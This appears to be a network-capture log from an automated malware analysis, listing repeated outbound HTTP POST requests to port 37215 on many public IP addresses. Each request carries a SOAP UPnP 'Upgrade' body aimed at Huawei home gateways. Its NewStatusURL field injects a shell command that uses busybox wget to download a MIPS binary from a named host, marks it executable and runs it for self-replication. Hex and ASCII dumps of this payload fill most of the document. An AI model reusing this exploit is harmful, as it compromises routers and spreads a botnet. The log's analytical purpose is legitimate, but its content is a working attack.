                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        227192.168.2.2341584197.194.186.10037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315645933 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        228192.168.2.2352148213.125.132.1437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315650940 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        229192.168.2.234400041.61.0.7537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315736055 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        230192.168.2.233381897.252.215.20737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315747976 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        231192.168.2.2351578197.18.224.11337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315754890 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        232192.168.2.2340344222.144.196.5837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315762043 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        233192.168.2.2353292197.205.65.18437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315767050 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        234192.168.2.2347908207.143.202.17137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315804005 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        235192.168.2.234624072.1.89.9637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315920115 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        236192.168.2.2346370197.233.197.24437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.315973043 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
